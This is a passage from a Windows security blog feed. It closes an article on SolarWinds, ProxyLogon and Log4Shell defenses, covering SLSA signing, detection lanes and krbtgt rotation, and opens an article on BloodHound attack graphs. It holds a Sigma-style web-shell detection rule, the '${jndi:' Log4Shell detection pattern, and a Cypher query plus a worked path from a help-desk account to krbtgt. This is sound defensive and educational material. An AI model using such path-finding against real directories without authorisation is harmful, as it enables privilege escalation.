&lt;p&gt;For build pipelines you own, the operational answer to the SUNSPOT lesson is the four-primitive chain that OpenSSF&apos;s SLSA v1.0 framework calls Build Level 3 [@slsa-v1-requirements]:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;GitHub Actions OIDC ID tokens&lt;/strong&gt; as workflow-bound short-lived identities, requested via &lt;code&gt;permissions: id-token: write&lt;/code&gt; in the workflow YAML. The token&apos;s subject claim binds the job to a named workflow file and ref [@github-oidc-docs].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Sigstore Fulcio&lt;/strong&gt; as the public-good keyless-signing certificate authority. Fulcio accepts the OIDC token plus an in-memory ephemeral keypair and returns a ~10-minute X.509 cert with the workflow SAN encoded into it [@sigstore-ccs2022, @cosign-signing-overview].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;cosign&lt;/strong&gt; signs the artifact with the ephemeral key and uploads the signature, certificate, and transparency-proof bundle [@cosign-signing-overview].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Rekor&lt;/strong&gt;, the Trillian-backed Merkle-tree transparency log at &lt;code&gt;rekor.sigstore.dev&lt;/code&gt;, returns a signed entry timestamp that asserts the signature existed before any later attacker could back-date it [@sigstore-rekor-docs].&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;No human signing key. No long-lived signing cert. No manual rotation. Every signing event is publicly auditable. SLSA Build Level 3 provenance is generated by the build platform itself through the OpenSSF reference reusable workflow &lt;code&gt;slsa-framework/slsa-github-generator&lt;/code&gt; and attested through the same cosign + Rekor lane [@slsa-gh-generator]. Pair the chain with one of three SBOM-attestation tools as the predicate payload: Microsoft&apos;s &lt;code&gt;sbom-tool&lt;/code&gt; for SPDX 2.2 / 3.0 drops on Microsoft-stack artifacts [@ms-sbom-tool], Anchore&apos;s &lt;code&gt;syft&lt;/code&gt; for multi-language SPDX + CycloneDX generation natively paired with the Grype vulnerability scanner [@anchore-syft], or Aqua Security&apos;s &lt;code&gt;trivy&lt;/code&gt; for single-step SBOM plus CVE plus IaC plus license plus secret scanning [@aquasec-trivy].&lt;/p&gt;

The OpenSSF SLSA framework&apos;s third Build-track level [@slsa-v1-requirements], reached when a build produces provenance that is *unforgeable* relative to the build platform itself. SLSA v1.0 (April 2023) defines three Build levels: L1 requires that provenance exists; L2 requires that provenance is authentic (signed by the build platform); L3 requires that provenance is unforgeable -- that is, the build platform&apos;s own identity is the signer, and no tenant on the build platform can produce provenance attributable to another tenant. Build L3 is what closes the SUNSPOT class for hosted-CI environments: even a tenant who controls their own build job cannot forge provenance for somebody else&apos;s artifact.

The Linux Foundation public-good keyless-signing project, composed of three components: **Fulcio**, a certificate authority that issues short-lived (~10-minute) X.509 certificates binding an ephemeral keypair to an OpenID Connect identity claim; **cosign**, the command-line tool that orchestrates the keyless-signing workflow against Fulcio and Rekor; and **Rekor**, an append-only transparency log built on Google&apos;s Trillian Merkle-tree library that records every signing event and returns a signed entry timestamp [@sigstore-ccs2022, @cosign-signing-overview, @sigstore-rekor-docs]. The architectural property Sigstore delivers is the elimination of long-lived signing keys: a build job that runs for ten minutes signs an artifact with a key that exists only for the duration of the job, after which both the key and the certificate expire.
&lt;p&gt;The canonical command-level tutorial for the Lane 1 chain lives at the OpenSSF SLSA &quot;Producing Artifacts&quot; requirements page [@slsa-v1-requirements] and the &lt;code&gt;slsa-framework/slsa-github-generator&lt;/code&gt; reusable-workflow README [@slsa-gh-generator]; this article is the architectural primer, not the command reference.&lt;/p&gt;
&lt;p&gt;Enable LSA Protection on every endpoint that supports it -- not just new Windows 11 22H2 clean installs, but every system in the fleet that can carry the configuration [@ms-lsa-protection]. Enable the Vulnerable Driver Blocklist [@ms-driver-blocklist]. Disable the Print Spooler on Domain Controllers as standing policy, per CISA ED 21-04 [@cisa-ed-21-04]. Roll out Pluton where the OEM ships it enabled; audit &quot;Pluton present but disabled&quot; with the same rigor as &quot;TPM present but disabled.&quot;&lt;/p&gt;
&lt;p&gt;{`
// Logic equivalent of an audit script that lists trusted publishers
// on a Windows endpoint and flags auto-updating vendors as
// supply-chain-exposed. Demonstrates the inventory shape.&lt;/p&gt;
&lt;p&gt;const trustedPublishers = [
  { name: &apos;SolarWinds Worldwide LLC&apos;, autoUpdate: true, deployment: &apos;SCCM&apos; },
  { name: &apos;Microsoft Corporation&apos;,   autoUpdate: true, deployment: &apos;WindowsUpdate&apos; },
  { name: &apos;Adobe Inc.&apos;,              autoUpdate: true, deployment: &apos;AdobeRMS&apos; },
  { name: &apos;VMware Inc.&apos;,             autoUpdate: false, deployment: &apos;manual&apos; },
];&lt;/p&gt;
&lt;p&gt;function exposureScore(p) {
  let s = 1;
  if (p.autoUpdate) s += 2;
  if (p.deployment === &apos;SCCM&apos; || p.deployment === &apos;Intune&apos;) s += 1;
  return s;
}&lt;/p&gt;
&lt;p&gt;const ranked = trustedPublishers
  .map(p =&amp;gt; ({ ...p, score: exposureScore(p) }))
  .sort((a, b) =&amp;gt; b.score - a.score);&lt;/p&gt;
&lt;p&gt;for (const p of ranked) {
  console.log(p.score + &apos; &apos; + p.name + &apos; (&apos; + p.deployment + &apos;)&apos;);
}
`}&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Lane 2: Detection deployment.&lt;/strong&gt; Microsoft Defender for Identity has SACL-based detections for DCSync, Golden Ticket, and Golden SAML signal patterns; deploy them and tune. Microsoft Defender for Endpoint has web-shell detections for the ProxyLogon-class IUSR-spawned &lt;code&gt;cmd.exe&lt;/code&gt; pattern; deploy them on every Exchange front-end. Sigma rules for the canonical post-exploitation fingerprints (the &lt;code&gt;${jndi:&lt;/code&gt; substring in any logged event field for Log4Shell-class detection; &lt;code&gt;RpcAddPrinterDriverEx&lt;/code&gt; for PrintNightmare-class detection on Domain Controllers).&lt;/p&gt;
&lt;p&gt;For the Conditional Access policy drift surface §9 names as open-problem-3, three open-source tools form a complementary cohort. None subsumes the others; each closes a structurally distinct detection lane.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Maester&lt;/strong&gt; is a PowerShell + Pester test-automation framework that wraps the Microsoft Graph Conditional Access &quot;What If&quot; evaluation API in the &lt;code&gt;Test-MtConditionalAccessWhatIf&lt;/code&gt; cmdlet. It ships built-in test profiles aligned to the OMB M-22-09 phishing-resistant-MFA baseline and the CISA ZTMM v2.0 Identity-pillar Optimal stage, and is designed to run as a recurring GitHub Actions, Azure DevOps, or Azure Automation job [@maester-github, @maester-docs, @maester-ca-whatif]. Maester occupies the &lt;strong&gt;assertion lane&lt;/strong&gt;: does the deployed CA-policy state pass an asserted baseline under What-If simulation?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;CAOptics&lt;/strong&gt;, Joosua Santasalo&apos;s Node.js permutation-enumeration tool, evaluates the (subject x app x condition) tuple space against the same Microsoft Graph CA-evaluation API and reports the gaps. It catches break-glass-account exclusion-clause interactions that Maester&apos;s assertion profiles do not exercise [@caoptics-github]. CAOptics occupies the &lt;strong&gt;gap-enumeration lane&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;BloodHound Community Edition with the SpecterOps AzureHound collector&lt;/strong&gt; is the cloud-side companion to SharpHound&apos;s on-premises Active Directory enumeration. Combined BloodHound CE graph models both on-premises and cloud-identity attack paths with explicit cross-boundary edges for Azure AD Connect, Pass-Through Authentication, hybrid-joined devices, and federated trusts [@azurehound-github, @bloodhound-azurehound-docs, @bloodhound-specterops]. BloodHound CE plus AzureHound occupies the &lt;strong&gt;graph-reachability lane&lt;/strong&gt;: what is the set of lateral-movement paths from any identity to any Tier-0 cloud or on-premises identity?&lt;/p&gt;
&lt;p&gt;Layer the three tools together. The composition is the operational closure of §5&apos;s &quot;policy is code&quot; claim against the §9 open-problem-3 detection lane.&lt;/p&gt;
&lt;p&gt;CAOptics was archived read-only by its maintainer in August 2024 with the README note &quot;Project archived due to shifting development priorities&quot; [@caoptics-github]. The tool remains functional and architecturally canonical for the gap-enumeration lane; readers wanting active development for the graph-reachability lane should track SpecterOps&apos;s BloodHound CE AzureHound documentation [@bloodhound-azurehound-docs] for the rolling-release collector and BloodHound CE schema updates.&lt;/p&gt;
&lt;p&gt;{`&lt;/p&gt;
Logic equivalent of a Sigma rule for the ProxyLogon-class web-shell
pivot. The rule matches the canonical fingerprint of an IIS worker
spawning cmd.exe under the IUSR identity (Exchange front-end shells
typically execute under IUSR_ after dropping into IIS).
&lt;p&gt;def matches_proxylogon_pivot(event):
    return (
        event.get(&apos;event_id&apos;) == 4688  # process creation
        and event.get(&apos;parent_process_name&apos;, &apos;&apos;).lower().endswith(&apos;w3wp.exe&apos;)
        and event.get(&apos;process_name&apos;, &apos;&apos;).lower().endswith(&apos;cmd.exe&apos;)
        and (event.get(&apos;user_name&apos;) or &apos;&apos;).lower().startswith(&apos;iusr&apos;)
    )&lt;/p&gt;
&lt;p&gt;example = {
    &apos;event_id&apos;: 4688,
    &apos;parent_process_name&apos;: &apos;C:\\Windows\\System32\\inetsrv\\w3wp.exe&apos;,
    &apos;process_name&apos;: &apos;C:\\Windows\\System32\\cmd.exe&apos;,
    &apos;user_name&apos;: &apos;IUSR_EXCH01&apos;,
}
print(&apos;match&apos; if matches_proxylogon_pivot(example) else &apos;no match&apos;)
`}&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Lane 3: Confirmed-compromise response.&lt;/strong&gt; A confirmed signed-vendor-update compromise is a vendor-level incident. Rotate every secret the trojanized binary could have read. Treat ADFS token-signing certificates as compromised; rotate them with new private key material on hardware-attested storage where possible. Rotate &lt;code&gt;krbtgt&lt;/code&gt; twice per the Microsoft AD Forest Recovery procedure to invalidate any &lt;a href=&quot;https://paragmali.com/blog/krbtgt-the-account-that-owns-active-directory/&quot; rel=&quot;noopener&quot;&gt;forged Kerberos tickets&lt;/a&gt;. Assume Conditional Access policies were bypassed during the active window if Golden SAML was in play; review sign-in logs for the affected federated trust for the full intrusion window.&lt;/p&gt;
&lt;p&gt;The double-&lt;code&gt;krbtgt&lt;/code&gt; rotation is not paranoia. A single rotation invalidates tickets signed with the prior key; a second rotation, after the configured maximum-ticket-lifetime, ensures the prior-prior key is also retired and no ticket signed with either prior key is still valid. The Microsoft AD Forest Recovery procedure documents the operation explicitly, with a minimum 10-hour wait between resets to exceed the default Maximum-Lifetime-For-User-Ticket and Maximum-Lifetime-For-Service-Ticket policy values [@ms-ad-forest-recovery-krbtgt]. The procedure exists because the second rotation cannot happen until any in-flight ticket with the prior key has expired, and skipping it leaves a window in which forged tickets remain serviceable.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Lane 4: What does not work.&lt;/strong&gt; The operational anti-patterns the four incidents made expensive.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Patching CVE-2021-26855 alone is insufficient if the web shell was already on disk before the patch -- the patch closes the entry; it does not remove the shell. Rotating &lt;code&gt;krbtgt&lt;/code&gt; does not address Golden SAML; Golden SAML is a SAML-token-signing problem, and &lt;code&gt;krbtgt&lt;/code&gt; is the Kerberos key. Rotating ADFS token-signing certificates is the corresponding action. Enabling Conditional Access for the identity the attacker forged tokens for is a closed-stable-door fix; Conditional Access enforcement happens at the resource server, and a forged SAML assertion already passed through the identity layer at the moment the resource server checks. Pluton on the workstation does not retroactively protect the Domain Controller -- Pluton is workstation-class silicon in 2023, and Server SKUs are a separate roadmap.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The FAQ closes the audit-flagged premises this article opened with.&lt;/p&gt;
&lt;h2&gt;11. Frequently Asked Questions&lt;/h2&gt;

No. The canonical pre-auth chain is three CVEs: CVE-2021-26855 (server-side request forgery) into CVE-2021-26858 or CVE-2021-27065 (arbitrary file write) into an ASPX web shell at SYSTEM [@volexity-exchange-marauder, @tenable-exchange-zd]. CVE-2021-26857 is a separate insecure-deserialization RCE in Exchange Unified Messaging that requires authentication; it sits in a parallel position to the SSRF chain rather than as a fused step. The &quot;four chained zero-days&quot; shorthand collapses two distinct attack-class shapes and obscures the SSRF-as-load-bearing-primitive observation. Microsoft&apos;s March 2 advisories cover all four CVEs together because they were patched together, not because they were exploited as a single linear chain.

No. See §3.2 Blast radius for the breakdown: Krebs reported &quot;at least 30,000&quot; U.S. organizations pre-patch on March 5 [@krebs-hafnium-march5]; Bloomberg reported &quot;as many as 60,000&quot; worldwide on March 7 [@krebs-hafnium-march5]. The figure that runs toward 250,000 aggregates *post-patch* indiscriminate exploitation by multiple actor groups (LuckyMouse, Tick, Calypso, Winnti, and others, per ESET&apos;s March 10 ten-APT-groups analysis [@eset-exchange-10apt-2021]) in the weeks after Microsoft&apos;s March 2 advisory; it is not a pre-patch numerator.

The product was called Azure AD Identity Protection at the time. Azure AD Conditional Access (the policy engine) and Azure AD Identity Protection (the risk-signal source) were already integrated before 2021; the integration is what makes risk-based Conditional Access policies possible. The &quot;Entra&quot; brand was introduced on May 31, 2022 as a family umbrella in Vasu Jakkal&apos;s &quot;Secure access for a connected world--meet Microsoft Entra&quot; announcement on the Microsoft Security Blog [@ms-entra-launch-may2022], and the rename of Azure AD to Microsoft Entra ID -- and therefore of Azure AD Identity Protection to Microsoft Entra ID Protection -- happened on July 11, 2023 [@ms-entra-rebrand]. Citations to the 2021-2022 product should use the Azure AD naming; citations to the current product use Microsoft Entra ID.

No. NIST SP 800-207 [@nist-sp-800-207] references BeyondCorp as one production implementation of Zero Trust principles, alongside other implementations and prior architectural work. The document is a vendor-neutral synthesis of Kindervag&apos;s 2010 Forrester framing [@kindervag-2010-forrester], Forrester&apos;s ZTX taxonomy, Gartner&apos;s CARTA continuous-evaluation framing, federal TIC guidance, and BeyondCorp&apos;s worked example. &quot;Zero Trust&quot; predates BeyondCorp -- Kindervag coined the term in September 2010, four years before Ward and Beyer&apos;s first BeyondCorp paper [@ward-beyer-2014-usenix]. The marketing-collapsed reading of &quot;Zero Trust equals BeyondCorp&quot; or &quot;Zero Trust equals Microsoft Conditional Access&quot; obscures a thirteen-year intellectual chain.

The bug is in Apache Log4j, a Java logging library [@log4j-apache-security], and the affected versions are Log4j 2.0 through 2.14.1. The vulnerability is not Windows-specific. It belongs in this Windows-security series because the most enterprise-impactful exploitation in Windows-server fleets ran through Java applications hosted on Windows: Tomcat, JBoss, VMware vCenter and Horizon, Atlassian Confluence and Jamf Pro on Windows, and dozens of internal Java services running on Windows Server with embedded JREs. The architectural lesson -- that transitive dependency graphs are the new universal attack surface -- applies to every operating system that hosts Java, but Windows fleets were a substantial fraction of the affected population.

Both, depending on what is being counted. Pluton was announced on November 17, 2020 [@weston-2020-pluton]. The first commercial PCs to ship with Pluton enabled were the Lenovo ThinkPad Z13 and Z16 with AMD Ryzen 6000 SoCs, announced at CES 2022 on January 4, 2022 [@pluton-windows-blog-jan2022, @lenovo-thinkpad-z-press-jan2022] with general commercial availability starting in May 2022 per Lenovo&apos;s StoryHub pricing-and-availability disclosure [@lenovo-thinkpad-z-press-jan2022]. The chipset rollout broadened across 2022-2024 to include AMD Ryzen 7000, 8000, and 9000, Intel Core Ultra 200V and Series 3, and Qualcomm Snapdragon 8cx Gen 3 and X Series processors [@ms-pluton-learn]. Pluton present is not Pluton enabled -- OEMs can disable the processor at the firmware level via PSP directory entry 0xB bit 36 on AMD platforms [@mjg59-pluton] -- so fleet-management claims about Pluton deployment should distinguish &quot;present&quot; from &quot;enabled and acting as the TPM.&quot;
&lt;p&gt;The four incidents are the receipt the industry collected on a thirty-six-year-old prediction. The Generation 5 defensive stack is the vocabulary the industry borrowed to talk about what changed. The vocabulary is now sufficient. The trust roots are not. Part 6 picks up the trust-root layer where Generation 5 left it -- Storm-0558 (July 2023), the Microsoft consumer-MSA signing-key compromise that produced enterprise tokens Conditional Access could not distinguish from legitimate ones, and the architectural question it opened: if the policy engine itself is privileged, what closes the compromise of the policy engine as a class?&lt;/p&gt;
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;windows-security-wars-part-5&quot; keyTerms={[
  { term: &quot;SUNBURST&quot;, definition: &quot;The first-stage backdoor inserted into SolarWinds.Orion.Core.BusinessLayer.dll during the SolarWinds build-pipeline compromise; Mandiant&apos;s December 13, 2020 disclosure name.&quot; },
  { term: &quot;Golden SAML&quot;, definition: &quot;Shaked Reiner&apos;s 2017 attack technique that forges SAML 2.0 authentication assertions from a compromised identity-provider token-signing key; the SolarWinds cloud-pivot primitive.&quot; },
  { term: &quot;JNDI&quot;, definition: &quot;The Java Naming and Directory Interface; Log4Shell exploited Log4j 2.x message-pattern substitution of JNDI lookups to load attacker-controlled Java classes.&quot; },
  { term: &quot;SBOM&quot;, definition: &quot;Software Bill of Materials; a machine-readable component inventory for a software artifact. CycloneDX and SPDX are the dominant standards.&quot; },
  { term: &quot;PDP / PEP&quot;, definition: &quot;Policy Decision Point and Policy Enforcement Point; the two load-bearing primitives in NIST SP 800-207&apos;s Zero Trust architecture.&quot; },
  { term: &quot;Conditional Access&quot;, definition: &quot;Microsoft&apos;s Zero Trust policy engine for Microsoft Entra ID; the PDP in Microsoft&apos;s stack.&quot; },
  { term: &quot;Primary Refresh Token (PRT)&quot;, definition: &quot;A long-lived authentication artifact issued by Entra ID, with a session key bound to the device&apos;s TPM on Entra-joined devices.&quot; },
  { term: &quot;Continuous Access Evaluation (CAE)&quot;, definition: &quot;Microsoft&apos;s implementation of the OpenID CAEP standard; allows resource servers to be informed mid-session of risk-state changes.&quot; },
  { term: &quot;RunAsPPL / LSA Protection&quot;, definition: &quot;Windows mechanism that runs LSASS as a Protected Process Light; default-enabled on Windows 11 22H2 new clean installs.&quot; },
  { term: &quot;BYOVD&quot;, definition: &quot;Bring Your Own Vulnerable Driver; an attack pattern using legitimately signed but exploitable third-party kernel drivers; the Vulnerable Driver Blocklist is Microsoft&apos;s curated defense.&quot; },
  { term: &quot;Zero Trust&quot;, definition: &quot;Architectural orientation refusing the privileged-inside-network assumption; coined by John Kindervag at Forrester in September 2010.&quot; },
  { term: &quot;Microsoft Pluton&quot;, definition: &quot;CPU-integrated security processor announced November 2020, first shipped May 2022 on Lenovo ThinkPad Z series; eliminates the LPC and SPI bus exposure of discrete TPMs.&quot; },
  { term: &quot;SLSA Build Level 3&quot;, definition: &quot;OpenSSF SLSA v1.0 build-track level at which the build platform itself produces unforgeable provenance for an artifact; the operational answer to the SUNSPOT class for hosted CI.&quot; },
  { term: &quot;Sigstore&quot;, definition: &quot;Linux Foundation public-good keyless-signing project composed of Fulcio (short-lived X.509 cert CA), cosign (CLI), and Rekor (transparency log); the production-grade implementation of OIDC-bound ephemeral signing.&quot; }
]} flashcards={[
  { front: &quot;What was the gap between the SolarWinds 18,000 and Brad Smith&apos;s fewer-than-100 numbers?&quot;, back: &quot;Eighteen thousand customers received the trojanized signed SUNBURST update; the attacker then pursued lateral movement against fewer than 100 high-value targets via Golden SAML token forgery against compromised ADFS.&quot; },
  { front: &quot;What is the canonical ProxyLogon CVE chain?&quot;, back: &quot;Three CVEs in linear position: CVE-2021-26855 (SSRF) into CVE-2021-26858 or CVE-2021-27065 (arbitrary file write) into ASPX web shell at SYSTEM. CVE-2021-26857 is a parallel authenticated-deserialization RCE.&quot; },
  { front: &quot;When was NIST SP 800-207 published relative to SolarWinds?&quot;, back: &quot;August 2020; four months before the December 13, 2020 Mandiant SUNBURST disclosure. Zero Trust was already on the shelf when SolarWinds needed it.&quot; },
  { front: &quot;What does Conditional Access correspond to in NIST SP 800-207 terms?&quot;, back: &quot;The Policy Decision Point (PDP). The resource being accessed (Exchange Online, SharePoint, a custom app) is the Policy Enforcement Point (PEP).&quot; },
  { front: &quot;What is the architectural significance of Storm-0558?&quot;, back: &quot;The post-window existence proof that the policy engine itself is a privileged plane. A compromised identity-provider signing key produces tokens that downstream Conditional Access cannot distinguish from legitimate ones.&quot; }
]} questions={[
  { q: &quot;Explain why Authenticode signing is not architecturally broken by SUNBURST, and identify what Authenticode does and does not assert.&quot;, a: &quot;Authenticode binds a publisher identity to a binary via X.509 signing. It asserts that the named publisher&apos;s key signed the byte sequence. It does not assert that the build pipeline that produced the byte sequence was uncompromised. SUNBURST was correctly signed; the build that produced the binary was malicious. The architectural primitive is intact at the level it was specified to operate; the trust root was specified at the wrong level for the threat that materialized.&quot; },
  { q: &quot;Walk the three-level distinction between Kindervag&apos;s Zero Trust, Google&apos;s BeyondCorp, and NIST SP 800-207. Why does the distinction matter for federal procurement?&quot;, a: &quot;Kindervag&apos;s 2010 Forrester paper coined the term and framed network-segmentation-first. BeyondCorp is Google&apos;s production implementation of Zero Trust principles, published 2014-2017. NIST SP 800-207 (August 2020) is the vendor-neutral synthesis with named PDP/PEP primitives. The distinction matters because federal procurement cites SP 800-207 as the canonical reference (per EO 14028 and OMB M-22-09); &apos;BeyondCorp&apos; is a brand for Google&apos;s implementation and does not carry federal-procurement weight.&quot; },
  { q: &quot;Explain the same-privilege paradox at the Zero Trust orchestration plane, and connect it to Microsoft&apos;s &apos;Assume Breach&apos; third principle.&quot;, a: &quot;A Zero Trust policy engine that decides every access decision is itself privileged. Compromise of the engine produces forged decisions that downstream resources cannot distinguish from legitimate ones. &apos;Assume Breach&apos; is the operational acknowledgment that this ceiling is unsolved -- it is a posture for limiting blast radius after compromise, not a mechanism for preventing the orchestration plane&apos;s compromise. Storm-0558 is the existence proof.&quot; }
]} /&amp;gt;&lt;/p&gt;
</content:encoded><category>windows-security</category><category>zero-trust</category><category>supply-chain</category><category>solarwinds</category><category>log4shell</category><category>printnightmare</category><category>proxylogon</category><category>history</category><category>The Windows Security Wars</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>AD Is a Graph: How BloodHound Made Defenders Think Like Attackers</title><link>https://paragmali.com/blog/ad-is-a-graph-how-bloodhound-made-defenders-think-like-attac/</link><guid isPermaLink="true">https://paragmali.com/blog/ad-is-a-graph-how-bloodhound-made-defenders-think-like-attac/</guid><description>From Lambert&apos;s 2015 essay to Microsoft Security Exposure Management in 2024 -- how the attack-path graph became the default model for Active Directory security.</description><pubDate>Tue, 26 May 2026 00:00:00 GMT</pubDate><content:encoded>
**AD is a graph.** In April 2015 John Lambert named the missing model in two sentences. In August 2016 Andy Robbins, Rohan Vazarkar, and Will Schroeder shipped the tool that made it operational: BloodHound treats Active Directory as a directed graph of privilege relationships, queries it with Neo4j&apos;s Cypher, and turns weeks of red-team whiteboard work into a 200 ms shortest-path lookup. By November 2024 Microsoft itself shipped the same mental model as Microsoft Security Exposure Management. This article is half tool history (1998 academic attack graphs through OpenGraph 2025) and half graph-theory exposition: property graphs, BFS shortest paths, the edge taxonomy, and the open problem of *weighting* what is currently treated as one BFS hop per privilege.
&lt;h2&gt;1. How do I get from this user to Domain Admin?&lt;/h2&gt;
&lt;p&gt;In 2014, a red-team analyst with a help-desk account inside a 40,000-user Active Directory forest asks the question every red-team analyst asks: &lt;em&gt;is there a path from here to Domain Admins?&lt;/em&gt; The answer takes two analysts five days of PowerView scripts, hand-drawn whiteboard diagrams, and per-host RDP probing. The same question in 2024 is a ninety-character Cypher query that returns in 200 milliseconds.&lt;/p&gt;
&lt;p&gt;What happened in those ten years is the story of one sentence -- &lt;em&gt;defenders think in lists, attackers think in graphs&lt;/em&gt; -- becoming, in turn, a tool, a discipline, and a Microsoft product.&lt;/p&gt;
&lt;p&gt;The 2014 reality was a stack of CSV files. PowerView, the PowerShell enumeration toolkit Will Schroeder first published in August 2014 [@powersploit-repo], could dump every group membership, every &lt;a href=&quot;https://paragmali.com/blog/windows-access-control-25-years-of-attacks/&quot; rel=&quot;noopener&quot;&gt;Access Control Entry&lt;/a&gt;, and every active session from a low-privilege account [@powertools-powerview]. The outputs were rows. Hundreds of thousands of rows. Composing them into a coherent attack path was a job for a marker and a whiteboard, and the join keys were Distinguished Names that wrapped twice across an analyst&apos;s notebook page. Five days to map a single 40,000-user forest was not unusual. It was the price of doing business.&lt;/p&gt;
&lt;p&gt;The 2024 reality is a query. The analyst loads SharpHound&apos;s JSON dump into a Neo4j graph, opens the BloodHound web interface in a browser, types&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-cypher&quot;&gt;MATCH p = shortestPath(
  (u:User {name:&apos;HELPDESK@CORP.LOCAL&apos;})-[*1..]-&amp;gt;(g:Group {name:&apos;DOMAIN ADMINS@CORP.LOCAL&apos;})
) RETURN p
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and clicks Run. The graph renders. The shortest path is highlighted. The pivot points are circled. Time elapsed: 200 milliseconds on the database, plus a second for the browser to draw the SVG [@bloodhound-ce-repo].&lt;/p&gt;
&lt;p&gt;Whatever happened in those ten years has to be more than a software release. It has to be a change in how the entire community models the problem. The change has a date and a sentence. Both arrived in April 2015. Let us start with the sentence.&lt;/p&gt;
&lt;h2&gt;2. From ACL lists to graphs -- why the model matters&lt;/h2&gt;
&lt;p&gt;&lt;em&gt;An access-control list is not the same as a graph -- and the difference is everything.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Consider five accounts in a hypothetical &lt;code&gt;CORP.LOCAL&lt;/code&gt; forest. Bob, a help-desk operator, has been granted &lt;code&gt;ForceChangePassword&lt;/code&gt; on Carol&apos;s account by a long-departed administrator who once needed to delegate password resets. Carol is a member of &lt;code&gt;Server Operators&lt;/code&gt;. &lt;code&gt;Server Operators&lt;/code&gt;, by default, can log on locally to Domain Controllers and back up the directory database. The Domain Controller hosts the &lt;a href=&quot;https://paragmali.com/blog/krbtgt-the-account-that-owns-active-directory/&quot; rel=&quot;noopener&quot;&gt;&lt;code&gt;krbtgt&lt;/code&gt; account&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Three rows in three different audit reports. One attack path.&lt;/p&gt;
&lt;p&gt;A per-object Access Control List audit looks at Bob&apos;s row, sees a &lt;code&gt;ForceChangePassword&lt;/code&gt; ACE, and flags it as &quot;an over-broad delegation.&quot; It looks at Carol&apos;s row, sees that she belongs to &lt;code&gt;Server Operators&lt;/code&gt;, and flags it as &quot;a privileged group membership.&quot; It looks at the Domain Controller and sees that &lt;code&gt;Server Operators&lt;/code&gt; has logon rights, which is the default. Nothing in the audit composes the three facts. Reachability is not a property the report computes.&lt;/p&gt;

A set of nodes (vertices) and directed edges (arrows) between them. Each edge points from one node to another. A *path* is a sequence of edges that can be traversed in the direction of their arrows. A node B is *reachable* from a node A if some path leads from A to B.

A property of two nodes A and B in a directed graph: B is reachable from A if there exists a sequence of edges leading from A to B, regardless of length. Reachability is fundamentally a graph property and cannot be answered by inspecting any single edge in isolation.
&lt;p&gt;Now draw the same five accounts as a directed graph. Bob is a node. Carol is a node. &lt;code&gt;Server Operators&lt;/code&gt; is a node. The Domain Controller is a node. The &lt;code&gt;krbtgt&lt;/code&gt; account is a node. There is an edge from Bob to Carol labelled &lt;code&gt;ForceChangePassword&lt;/code&gt;. There is an edge from Carol to &lt;code&gt;Server Operators&lt;/code&gt; labelled &lt;code&gt;MemberOf&lt;/code&gt;. There is an edge from &lt;code&gt;Server Operators&lt;/code&gt; to the Domain Controller labelled &lt;code&gt;CanRDP&lt;/code&gt;. There is an edge from the Domain Controller to &lt;code&gt;krbtgt&lt;/code&gt; labelled &lt;a href=&quot;https://paragmali.com/blog/two-checkmarks-and-the-keys-to-the-kingdom-how-active-direct/&quot; rel=&quot;noopener&quot;&gt;&lt;code&gt;DCSync&lt;/code&gt;&lt;/a&gt;. Trace the arrows. Bob can reach &lt;code&gt;krbtgt&lt;/code&gt;.&lt;/p&gt;

flowchart LR
    Bob([Bob, help-desk]) --&amp;gt;|ForceChangePassword| Carol([Carol])
    Carol --&amp;gt;|MemberOf| SO([Server Operators])
    SO --&amp;gt;|CanRDP| DC([Domain Controller])
    DC --&amp;gt;|DCSync| Krb([krbtgt])
&lt;p&gt;The graph form makes reachability visually obvious. The list form does not. This is not a presentation difference. It is a data-model difference, and it is the difference that decides whether a tool can answer the question &lt;em&gt;&quot;is there a path from A to B?&quot;&lt;/em&gt; at all.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Reachability is a property of the graph that the list does not, in general, express. This is not a UX difference. It is a data-model difference, and it is the entire reason BloodHound exists.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The sentence that named this gap appeared on April 26, 2015. John Lambert, then a Distinguished Engineer in the Microsoft Threat Intelligence Center, published a short essay to a personal GitHub repository [@lambert-2015-defenders-lists-attackers-graphs]. No peer review. No formal venue. Two declarative opening sentences that every defender attack-path product since has cited approvingly.&lt;/p&gt;

Defenders don&apos;t have a list of assets -- they have a graph. Assets are connected to each other by security relationships. As long as defenders use a list and attackers use a graph, attackers win. -- John Lambert, April 26, 2015.
&lt;p&gt;Lambert then enumerated five concrete classes of &quot;security dependencies&quot; that constitute edges in any real network: shared local-admin passwords; logon scripts on file servers; print-driver propagation from print servers; certificate authorities that mint smart-card logon certificates; and database administrators who run code as a privileged DB process. The essay closed with a defender prescription: &lt;em&gt;&quot;The first step is to visualize your network by turning your lists into graphs.&quot;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;If the diagnosis is so obvious in retrospect, why was every mainstream AD audit tool from 2000 through 2015 list-shaped? The answer is that the academic literature had the right model but the wrong substrate, and the operator community had the right substrate but the wrong model. The two did not meet until April 2015.&lt;/p&gt;
&lt;h2&gt;3. Attack graphs before BloodHound, 1998 to 2015&lt;/h2&gt;
&lt;p&gt;The phrase &lt;em&gt;attack graph&lt;/em&gt; is older than Active Directory itself.&lt;/p&gt;
